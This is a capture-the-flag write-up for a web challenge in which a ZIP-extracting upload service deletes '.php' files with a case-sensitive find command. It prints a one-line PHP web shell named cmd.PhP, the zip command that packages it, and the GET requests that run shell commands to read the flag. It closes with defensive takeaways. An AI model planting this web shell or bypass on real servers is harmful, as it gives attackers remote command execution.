> For the complete documentation index, see [llms.txt](https://lance-kenji.gitbook.io/me/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://lance-kenji.gitbook.io/me/nullcon-hackim-ctf-goa-2026-writeups/web/virus-analyzer.md).

# Virus Analyzer

**Category:** Web

**Difficulty:** Medium

***

### 1. Challenge Overview

The challenge presents a web service called **Virus Analyzer**. The UI is sleek and professional, mimicking a security tool. It invites users to upload a `.zip` archive, which it promises to extract and analyze for malicious content. Upon visiting the site, I noticed there was no source code provided, forcing a black-box approach.

The core functionality is simple:

1. Upload a ZIP.
2. The server extracts it to a random subdirectory in `/uploads/`.
3. It lists the files and provides links to view them.
4. It claims to be "safe" because it deletes uploaded files.

***

### 2. Vulnerability Analysis

#### The Discovery Phase (Step-by-Step Testing)

Since I didn't have the source code initially, I had to poke at the server's behavior:

1. **Standard File Upload:** I uploaded a ZIP containing `test.txt`. It worked perfectly, and I could view the file at `/uploads/[ID]/test.txt`.
2. **The "PHP" Block Test:** I uploaded a ZIP containing `info.php` (with `<?php phpinfo(); ?>`).
   * **Observation:** The results page showed `info.php` was extracted, but clicking the link resulted in a **404 Not Found**.
   * **Conclusion:** There is an automated cleanup script deleting `.php` files almost immediately.
3. **The Case-Sensitivity Test:** I know that many Linux-based cleanup scripts use standard `find` commands. I decided to test if the filter was case-sensitive by uploading a ZIP with `cmd.PhP`.
   * **Observation:** This file was **NOT** deleted. I was able to access the file and it was successfully parsed as PHP by the server.

#### Code Confirmation

Once I had a working shell, I ran `cat ../../index.php` to see the actual logic. The "Aha!" moment came from this line:

```php
// Safety measure: delete all .php files after 10 seconds
$cmd = "(sleep 0 && find " . escapeshellarg($extract_dir) . " -name '*.php' -delete ) > /dev/null 2>&1 &";
exec($cmd);
```

The developer used `-name '*.php'`, which is strictly case-sensitive in Linux. Files ending in `.PhP` or `.PHP` completely bypass this security rule.

***

### 3. Developing the Exploit

I needed to weaponize the case-sensitivity bypass to get full control over the server.

1. **The Payload:** I created a minimalist PHP web shell to minimize the chance of being caught by any actual "virus" scanners:

```php
<?=`$_GET[0]`?>
```

2. **The Naming:** I named the file `cmd.PhP`.
3. **The Delivery:** I zipped the file using the command line:

```bash
zip exploit.zip cmd.PhP
```

***

### 4. The PoC (Proof of Concept)

1. **Upload:** I uploaded `exploit.zip` via the web interface.
2. **Identify ID:** The site redirected me to a results page with the path: `/uploads/af3a98fdf74ef742/`.
3. **Execution:** I tested the shell by listing the root directory to see what I was working with.
   * **URL:** `http://52.59.124.14:5008/uploads/af3a98fdf74ef742/cmd.PhP?0=ls /`
   * **Result:** I saw a standard Linux directory structure and a very interesting `flag.txt` in the root.

***

### 5. The Winning Payload

With the location of the flag confirmed, the final payload was simple:

**Command:**

```http
GET /uploads/af3a98fdf74ef742/cmd.PhP?0=cat+/flag.txt
```

***

### 6. Result

The server executed the `cat` command and returned the flag content:

> **Flag:** `ENO{cl34nup_scrip7s_4r3_n07_3n0ugh_8281}`

**Key Takeaways:**

* **Blacklisting is not Security:** Relying on specific file extensions for safety is a losing game.
* **Find Command Nuance:** In Linux, `-name` is case-sensitive. To be secure, the developer should have used `-iname`.
* **Execution Context:** The web server was configured to parse any case variation of `.php` as a script, while the cleanup script was only looking for one specific version.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://lance-kenji.gitbook.io/me/nullcon-hackim-ctf-goa-2026-writeups/web/virus-analyzer.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.